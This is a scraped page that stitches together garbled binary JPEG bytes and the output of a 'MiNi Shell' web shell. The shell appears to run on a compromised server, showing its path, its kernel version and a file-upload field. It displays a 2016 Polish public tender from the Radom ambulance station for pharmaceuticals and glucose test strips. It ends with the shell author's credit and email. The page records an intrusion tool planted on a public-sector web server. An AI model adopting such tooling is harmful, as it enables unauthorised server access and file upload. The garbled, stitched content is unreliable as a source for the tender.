JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160404/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160404/34251-N-2016.html

<p class="kh_header"><b>Radom: Przedmiotem zamówienia     jest :   dostawa  -  produktów farmaceutycznych  oraz wyrobów diagnostycznych  dla Radomskiej Stacji Pogotowia Ratunkowego.</b><br>
<b>Numer ogłoszenia: 34251 - 2016; data zamieszczenia: 04.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomska Stacja Pogotowia Ratunkowego , ul. Tochtermana 1, 26-600 Radom, woj. mazowieckie, tel. 048 3626389, faks 048 3624847.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pogotowie.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia     jest :   dostawa  -  produktów farmaceutycznych  oraz wyrobów diagnostycznych  dla Radomskiej Stacji Pogotowia Ratunkowego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia     jest :   dostawa  -  produktów farmaceutycznych  oraz wyrobów diagnostycznych  dla Radomskiej Stacji Pogotowia Ratunkowego.
Przedmiot zamówienia został podzielony  na części  : część Nr 1  i  część Nr 2  
w następujących ilościach i rodzajach wyszczególnionych w poniższych tabelach:
- Część Nr 1
1	 Ethylis  chloridum aerozol a 70g	30	op
2	Adrenalinum 0,001    1 ml x 10 amp	350	op
3	Alumini acetotartras żel 75g	20	op
4	Amiodarone amp 50mg/ml a  amp po 3 ml	300	amp
5	Aqua pro inj a 5 ml x 100 amp	50	op
6	Aqua pro inj a 250 ml  butelka plastikowa 	50	flakonów
7	Atropinum sulf. Inj. 1mg/1 ml x 10 amp	100	op
8	Benzyna 800,0	5	op
9	 Hyoscini butylbromidum x 10 amp	400	op
10	Calcii chloridum 10% x10 amp.	10	op
11	Captopril 12,5 mg x 30 tabl	500	op
12	Captopril 25 mg x 40 tabl	150	op
13	Carbo medicinalis x 20 tabl 300 mg	20	op
14	Chlorpromazyna 25mg/5ml x 5 amp	5	op
15	Chlorpromazyna 50mg/2mlx 10 amp	5	op
16	Clemastin inj. 0,002/2ml x 5 amp	600	op
17	Clonazepam inj. 1mg/ml x 10 amp	250	op
18	Clopidogrelum 75 mg x 28 tbl.	100	op
19	Dexamethason 0,004/1 ml x 10 amp	300	op
20	Dexamethason 0,008/2 ml x 10 amp	300	op
21	Diazepam in.j 0,01g/2 ml x 50 amp	40	op
22	Diazepam5mg/2,5ml x 5 szt. mikrowlewki doodbytnicze	50	op
23	Digoxin inj 0,5 mg/2 ml x 5 amp	30	op
24	Dobutamine inj. 0,25g fiolka	40	fiolka
25	Dopaminum  h/chl 0,05g/5ml x 10 amp 1%	10	op
26	Dopaminum h/chl 0,2g/5ml x 10 amp  4%	20	op
27	Drotaverinum 20mg/mlx5amp 2ml	700	op
28	Drotaverinum tbl 0,04g x 20 tabl	50	op
29	Fentanyl  inj 0,1 mg/2 ml	100	amp
30	Flumazenil 0,5 mg/5 ml x 5 amp	5	op
31	Nadroparinum Calcicum 0,3 ml x 10 amp. 3800 j.u	6	op
32	Furosemid  inj. 0,02/2ml x 5 amp	1000	op
33	Glucagon 1 mg (ampułkostrzykawka)	25	ampułko-strzykawka
34	Glukosum 20% 10 ml x 10 amp	200	op
35	Glukosum 20% 250ml butelka plastikowa	900	flakon
36	Glukosum 5% 500 ml butelka plastikowa	400	flakon
37	Glukosum 5% a 250 ml butelka plastikowa	150	flakon
38	Hydrocortisonum inj. 0,025 x 5 amp	10	op
39	Hydrocortisonum inj .0,1g/2ml x 5 amp	1500	op
40	Hydroxyzinum 25 mg x 30 tabl	300	op
41	Hydroxyzinum Hydrochloridum 100mg/2ml x 5 amp 	1000	op
42	Ibuprofenum 60 mg czopki x 10 szt	40	op
43	Ibuprofenum 125 mg czopki x 10 szt	25	op
44	Kalium effervescens gran.bezcukr. 3 g x 20 torebek	40	op
45	Ketoprofen x 10 amp/2ml	1600	op
46	Kwas Acetylosalicylowy 0,3g x 20 tbl	250	op
47	Lidocain aerosol a 38 g	20	op
48	Lidocaine 2% a 20 ml  x 5 fiolek	15	op
49	Lidocaine h/chl 2%  2 ml x 10 amp	20	op
50	Lidocaine żel typ A a 30g	100	op
51	Magnesium Sulfuric inj doż. 2g/10ml x 10 amp	10	op
52	Mannitol 20% a 250 ml worek plastikowy	50	flakon
53	Metamizol 2.5mg/5 ml x 5 amp	2500	op
54	Metoclopramid h/chl 10mg/2ml x 5 amp 	1500	op
55	Metoprolol x 5 amp 1mg/ml amp 5 ml	10	op
56	Midazolamum  1mg/ml amp a 5 ml	100	amp
57	Morphini sulfas inj 0,02g/1ml x 10 amp	40	op
58	Naloxonum h/chl 0,4 mg/1ml x 10 amp 	10	op
59	Natrium bicarbonic 8,4% 20ml x 10 amp.	20	op
60	Natrium chloratum 0,9 % a 10ml amp(plastik) x 100 amp	400	op
61	Natrium chloratum 0,9% 500ml  butelka palstikowa	4500	flakon
62	Nifuroxazyd tbl 0,1g x 24 tabl	30	op
63	 Glyceroli trinitras x 200 dawek	50	op
64	Oxycort aerosol 30g	20	op
65	Oxytocin 5j x  10 amp a 1 ml temp.przech.poniżej 25 °C /poza lodówką/	5	op
66	Papaverini h/chl 0,04g/2ml x 10 amp	800	op
67	Paracetamol 0,125 mg x 10 supp	40	op
68	Paracetamol 10 mg/ml fiolka i.v. 50 ml 	150	flakon
69	Paracetamol a 0,250 x 10 supp.	40	op
70	Paracetamol   a 500 mg tabl.	6000	tbl
71	Pethidini hydrochloridum x 10 amp 100mg/ 2 ml	40	op
72	Phenobarbital 0,015  x 10 czopków	5	op
73	Płyn wieloelektrolitowy a 500 ml butelka plastikowa	2000	flakon
74	Propranolol 0,01g x 50 tbl	80	op
75	Propofolum 1% 10 mg/ml 20 ml ini.doż.emuls.x 5 fiolek	10	op
76	Prostin VR 05mg/ml x 5 amp a 1ml	1	op
77	Metamizol natrium  tbl x 6 tabl. 500 mg	500	op
78	 Ethacridini lactas 0.1 % 250ml płyn	20	butelka
79	Salbutamol  0,1% 2,5mg/2,5 ml x 20 amp roztwór do nebulizacji	20	op
80	Salbutamol 0,5mg/1ml x 10 amp.	15	op
81	Sol. Ringeri a 250 ml butelka plastikowa	70	flakon
82	Spirytus salicylowy 800g	100	butelek
83	Spirytus salicylowy a 100g	20	butelka
84	Surfaktant 1,5 ml  80 mg/ml	16	fiolka
85	Suxamethoni chloridum 200 mg inj. x 10 fiolek	5	op
86	Tikagrelor 90 mg (Brilique) x 56 tbl	15	op
87	Theophyllinum 300mg/250ml	50	flakon
88	 Theophyllinum 20 mg/ml x 5 amp 10 ml	800	op
89	Tramadol  h/chl 0,05/1ml x 5 amp 	500	op
90	Tramadol h/chl 0,01/2ml x 5 amp 	300	op
91	Urapidil 25 mg i v.  x 5 amp a 5 ml	10	op
 	 	 	 

- Część Nr 2 
wyroby diagnostyczne,
	paski testowe  do pomiaru stężenia glukozy we krwi OPTIUM XIDO x 50	600	op
2. Zamawiający  dopuszcza składanie ofert częściowych: 
      - Część Nr 1 - produkty farmaceutyczne /leki/  - poz.  1- 91
      - Część Nr 2  -  wyroby diagnostyczne / paski testowe  do pomiaru stężenia glukozy we krwi OPTIUM XIDO /  - poz.1                                                                                                                                    
 Asortyment będący przedmiotem zamówienia musi być dopuszczony do obrotu i używania, w przypadku produktów leczniczych zgodnie z ustawą z dnia 6.09.2001 r. Prawo farmaceutyczne (tekst jednolity Dz. U. z 2008 r. Nr 45 poz. 271 z późn. zm.), posiadać aktualne atesty i świadectwa rejestracji oraz właściwe pozwolenie na dopuszczenie do obrotu na terenie Polski, wydane przez uprawniony organ z aktualną datą ważności oraz identyfikujący producenta i typ wyrobu.
                             
Kody Wspólnego Słownika Zamówień:
kod CPV: 33600000-6 - produkty farmaceutyczne
kod CPV: 33124130-5  - wyroby diagnostyczne.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6, 33.12.41.30-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy spełniają warunki 
określone w art.22 ust.1 ustawy prawo zamówień publicznych dotyczące: 
Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania:
Zamawiający uzna , że Wykonawca posiada uprawnienia do wykonywania określonej działalności, jeżeli wykaże, że posiada zezwolenie na prowadzenie obrotu produktami leczniczymi zgodnie z ustawą z dnia 06.09.2001r. Prawo farmaceutyczne (t.j. Dz.U. 
z 2008r.Nr 45, poz.271 ze zm.)
 Opis sposobu dokonywania oceny spełniania tego warunku : 
Zamawiający dokona oceny spełnienia przez Wykonawcę w/w warunku na dzień otwarcia ofert na podstawie złożonego wraz z ofertą zezwolenia na  prowadzenie obrotu produktami leczniczymi zgodnie z ustawą z dnia 06.09.2001r. Prawo farmaceutyczne(t.j. Dz.U. z 2008r.Nr 45, poz.271 ze zm.) zgodnie z zasadą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania wiedzy i doświadczenia:
  Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Opis sposobu dokonywania oceny spełniania tego warunku : 
Zamawiający dokona oceny spełnienia przez Wykonawcę w/w warunku na dzień otwarcia ofert na podstawie złożonego wraz z ofertą  oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z zasadą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym  oraz osobami zdolnymi do wykonania zamówienia:
      Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Opis sposobu dokonywania oceny spełniania tego warunku : 
Zamawiający dokona oceny spełnienia przez Wykonawcę w/w warunku na dzień otwarcia ofert na podstawie złożonego wraz z ofertą  oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z zasadą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym  oraz osobami zdolnymi do wykonania zamówienia:
   Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Opis sposobu dokonywania oceny spełniania tego warunku : 
Zamawiający dokona oceny spełnienia przez Wykonawcę w/w warunku na dzień otwarcia ofert na podstawie złożonego wraz z ofertą  oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z zasadą,  spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacji ekonomicznej i finansowej:
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Opis sposobu dokonywania oceny spełniania tego warunku : 
Zamawiający dokona oceny spełnienia przez Wykonawcę w/w warunku na dzień otwarcia ofert na podstawie złożonego wraz z ofertą  oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z zasadą spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Na ofertę składają się następujące dokumenty i załączniki:
a)  wypełniony i podpisany  formularz ofertowy z wykorzystaniem wzoru stanowiącego-  
    załącznik nr 1 do SIWZ.
 b) wypełniony i podpisany  formularz cenowy z wykorzystaniem wzoru stanowiącego-  
    załącznik nr 1A lub 1B  do SIWZ.
c)  Oświadczenie o spełnianiu warunków udziału w postępowaniu o zamówienie publiczne z art.22 ust.1 z wykorzystaniem wzoru stanowiącego -załącznik nr 2 do SIWZ,
d)  Oświadczenie o braku podstaw do wykluczenia z powodu niespełnienia warunków, 
o których mowa w art.24 ust. 1  z wykorzystaniem wzoru stanowiącego - załącznik nr 3 do SIWZ,      
e)  Oświadczenie Wykonawcy: że należy do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy, lub oświadczenie, że Wykonawca nie należy do żadnej grupy kapitałowej z wykorzystaniem wzoru stanowiącego -załącznik nr 4 do SIWZ,
 f)  Wypełniony i podpisany  formularz cenowy  z wykorzystaniem wzoru- załącznik 
  nr 5 do SIWZ,
f)   Oświadczenie w trybie art.44 ustawy -  zawarte w treści druku formularza ofertowego,
g)  Akceptacja projektu - umowy  - załącznik nr 5 do SIWZ - zawarta w treści druku 
      formularza ofertowego,
h)  Aktualny odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności  gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt 2 Ustawy, wystawionego  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,    
 i)  Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych,
j) Dokumenty potwierdzające posiadanie uprawnień do wykonywania określonej działalności lub czynności , jeżeli przepisy prawa nakładają  obowiązek ich posiadania ,
 w szczególności koncesji,  zezwolenia lub licencji tj. zezwolenia prowadzenie obrotu produktami leczniczymi zgodnie z ustawą z dnia 06.09.2001r. Prawo farmaceutyczne  
(t.j. Dz.U. z 2008r.Nr 45, poz.271 ze zm.) Oferowane produkty lecznicze muszą być dopuszczone do obrotu, w rozumieniu ustawy z ustawą z dnia 06.09.2001r. Prawo farmaceutyczne  (t.j. Dz.U. z 2008r.Nr 45, poz.271 ze zm.) - tj. posiadać Pozwolenie Ministra Zdrowia lub Prezesa Urzędu Rejestracji Produktów Leczniczych, wyrobów Medycznych i produktów biobójczych lub Radę Unii Europejskiej lub Komisję Europejską na dopuszczenie do obrotu produktu leczniczego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pogotowie.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Radomska Stacja Pogotowia Ratunkowego w Radomiu, ul. Tochtermana 1, 26-600 Radom,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.04.2016 godzina 10:00, miejsce: sekretariat - I piętro (pok. nr 12), w siedzibie Radomskiej Stacji Pogotowia Ratunkowego w Radomiu, ul. Tochtermana 1, 26-600 Radom,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com